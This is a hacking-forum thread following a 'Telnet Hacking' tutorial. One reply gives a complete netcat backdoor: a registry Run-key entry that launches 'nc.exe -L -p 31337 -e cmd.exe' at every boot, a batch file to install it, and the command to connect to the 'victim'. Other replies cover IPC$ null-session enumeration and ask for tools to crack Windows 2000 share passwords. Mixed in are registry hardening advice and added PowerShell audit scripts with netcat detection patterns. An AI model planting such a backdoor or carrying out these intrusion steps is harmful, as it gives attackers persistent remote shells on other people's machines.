I tried to describe Microsoft Telnet hacking.
Read it please and tell me your comments, plz.
Full Version: [tut] Telnet Hacking
Good idea for a backdoor
Thanks for the explanations.
That works as well as the following does with netcat.
I know the topic was about telnet, but whatever, I post it anyway =)

Create a reg file, i.e. 'foo.reg', which contains ...
-----------------------------------------------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"nc"="nc.exe -d -L -t -p 31337 -e cmd.exe"
-----------------------------------------------

Create a 'foo.bat' which contains ...
-----------------------------------------------
@echo off
regedit /s foo.reg
------------------------------------------------

Place the nc.exe, foo.reg and foo.bat in c:\windows\system32\ (on remote computer).
Run the foo.bat [c:\windows\system32\start foo.bat] (on remote computer).
Now nc will start every time Windows starts and will listen on port 31337 on the remote computer.
So you just run ....
nc [victim ip] 31337 (on local computer)
And now you have a more stable shell =)
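A defender-side check for the persistence mechanism in the post above, added here as an example and not part of the original thread: a PowerShell script that enumerates the Run keys that foo.reg writes to and flags entries that look like a bound shell. The pattern list is constructed from the command in the post and is an assumption; extend it for your environment.

```powershell
# Added example (not the poster's code): audit the HKLM/HKCU Run keys for
# autostart entries resembling the netcat listener described in the thread.
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
)

# Constructed indicators, taken from "nc.exe -d -L -t -p 31337 -e cmd.exe".
$suspicious = @('nc.exe', 'nc64.exe', 'netcat', '-e cmd', '-L -t -p', '-p 31337')

# Provider metadata properties that Get-ItemProperty adds; not registry values.
$meta = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')

foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $entries = Get-ItemProperty -Path $key
    foreach ($p in $entries.PSObject.Properties) {
        if ($meta -contains $p.Name) { continue }
        $cmd  = [string]$p.Value
        $hits = $suspicious | Where-Object { $cmd -like "*$_*" }
        if ($hits) {
            Write-Output ("SUSPICIOUS  {0}\{1} = {2}  [matched: {3}]" -f $key, $p.Name, $cmd, ($hits -join ', '))
        } else {
            Write-Output ("ok          {0}\{1} = {2}" -f $key, $p.Name, $cmd)
        }
    }
}
```

Pair the registry check with a look at which process is listening on unexpected ports (netstat -ano), since the Run entry only shows what starts, not what is currently bound.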
Thanks, but I prefer telnet a LOT as it provides a password.
Nice research there, lilttlehacker! (BTW, A.3: Win2k has this option as "Management" only.) Definitely keeping this for reference. Thanks.
I'm a lil lost here with everything.
Good guide!
Btw, does anybody know a good free SSH server for Windows?
I tried to test telnet locally, but I can't find the NTLM key in HKLM/Software/Microsoft/TelnetServer/1.0/. Should I create it? I'm running WinXP Pro SP1. Thanks. PS: and could someone post a link to a good IPC$ null sessions hacking paper, plz?
Hey, thanks, nice topic!
andream! An IPC$ null session is just a NetBIOS connection without a password!
For null session hacking, try NAT!
Can't open PDF... Adobe Reader 6 says "There was an error opening this document. The file is damaged and could not be repaired".
Is this wrong only for me?
Me too.
I can't open this file or any other attached file :S
PDF worked fine for me, nice read there.
I've created it for Acrobat Reader v.5.0 and later.
The tutorial is easy and not messy... so, great tut.
I should expect a lot more replies though for this kind of HELPFUL, self-written tut. Good job!! Serhat
Good, dude. I will write a small note about null sessions. Here we go.
All variations of the Windows NT kernel have a major security flaw: they allow a peculiar form of access called a null or anonymous session, which can yield dangerous information about a machine and its SAM (Security Accounts Manager) accounts. SAM is a local security database that stores information about all of a machine's user and group accounts. Discovering a SAM account with administrative privileges would be a hacker's first objective—but getting the name of any account is a big step. With a user name, a hacker has a hope of eventually breaking into the user's account, then jacking up account privileges to the admin level.

There is a reason Windows allows anonymous access. In a trusted environment, this lets Windows NT, 2000, and XP machines see one another's shared folders and attached peripherals via the InterProcess Communication share (IPC$). Allowing IPC$ is a must for some simple peer networks. But IPC$ also allows entry to client machines. A hacker who types net use \\yourcomputer\ipc$ "" /user:"" at a command line (where yourcomputer is either your internal IP address or your NetBIOS machine name) is assigned a blank name and password and connected to your PC. Establishing a null session like this does not allow control of your machine, but it does reveal all the user names on your system, the groups your system belongs to, the rights it has, and any shares available.

By setting or modifying a value in the Registry, you can restrict anonymous access. For Windows NT or 2000, go to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa. Look in the right-hand pane for the DWORD value RestrictAnonymous. If you don't find it, right-click in the right-hand pane, choose Edit | New | DWORD Value, and name the value RestrictAnonymous. In Windows NT with Service Pack 3 or in Windows 2000, the data for this value can be 0, 1, or 2 (we'll get to Windows XP in a moment). If it's 2, you're all set. No information can leak via a null session, because there is no way to establish one. If the value is 1 (all that was allowed before Windows NT with SP3), some tools can still enumerate information. If it is 0, your machine is wide open. Double-click on the value and set its data to 1 or 2, then restart the system. Although 2 is preferable, it may cause connectivity and sharing problems when used outside of an environment running only Windows 2000. For example, down-level clients won't be able to establish access to the domain the Windows 2000 machine is hosting; that effectively closes those clients off from the network's resources.

Windows XP solves the problems that a setting of 2 can introduce by adding more flexibility to null-session restrictions. In addition to RestrictAnonymous, Windows XP has two other DWORD values you can modify—RestrictAnonymousSAM and EveryoneIncludesAnonymous. Set RestrictAnonymous to 1 to limit access to share information, and set RestrictAnonymousSAM to 1 to prevent enumeration of SAM accounts. Finally, assign EveryoneIncludesAnonymous a value of 0, which will keep null-session users from having any rights. This still allows the establishment of a null session, so basic network resources such as files and printers remain available to all trusted users, but nothing will leak.

Prevent hacking, protect your environment. Manu
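An added example, not from the thread: a PowerShell audit of the Lsa values the note above describes, run locally as an administrator. The expected values are taken from the note (RestrictAnonymous 1 or 2, RestrictAnonymousSAM 1, EveryoneIncludesAnonymous 0); the latter two exist only on XP and later, so a missing value is reported rather than flagged, and the commented Set-ItemProperty line is an assumed remediation, not part of the note.

```powershell
# Added example (not the poster's code): report the null-session restriction
# values under the Lsa key and compare them with the hardened settings above.
$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

# Expected values per the note. RestrictAnonymous=2 is the NT/2000 "no null
# sessions at all" setting; 1 is the XP "limit share information" setting.
$checks = @(
    @{ Name = 'RestrictAnonymous';         Expected = @(1, 2) }
    @{ Name = 'RestrictAnonymousSAM';      Expected = @(1) }
    @{ Name = 'EveryoneIncludesAnonymous'; Expected = @(0) }
)

$props = Get-ItemProperty -Path $lsa -ErrorAction Stop

foreach ($c in $checks) {
    $value = $props.($c.Name)
    if ($null -eq $value) {
        # Absent value: the OS default applies (0 for RestrictAnonymous on
        # NT/2000, i.e. wide open; the XP-only values simply do not exist there).
        Write-Output ("{0,-26} MISSING  (OS default applies)" -f $c.Name)
    } elseif ($c.Expected -contains $value) {
        Write-Output ("{0,-26} {1}  OK" -f $c.Name, $value)
    } else {
        Write-Output ("{0,-26} {1}  WEAK (expected {2})" -f $c.Name, $value, ($c.Expected -join ' or '))
    }
}

# Assumed remediation for XP, mirroring the note; a reboot is required afterwards.
# Set-ItemProperty -Path $lsa -Name RestrictAnonymousSAM -Value 1 -Type DWord
```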
Nice tutorial, good work.
Hi,
To start with this tutorial one needs to know the password of a remote PC's admin account. That's exactly my problem. I went through several articles in the articles section, but that stuff didn't work for me. gsec/articles/HackingaWindows2000systemthroughIPC.php for example:

2: Connecting to the IPC$
A. Open a DOS window
B. Type in " net use \\ipaddress\ipc$ "" /user:administrator "
C. If you connect to the system, it will say, " The command was completed successfully "
D. If it says, "bad username or password", try running PQWak.exe to crack the share name password.

Then... on another page I've read PQWak can only crack Win95/98/ME shares. Could someone plz give me a tool to crack Win2k shares? Another question: is there a way to crack Win2k via NetBIOS if there aren't any open shares but file sharing is enabled?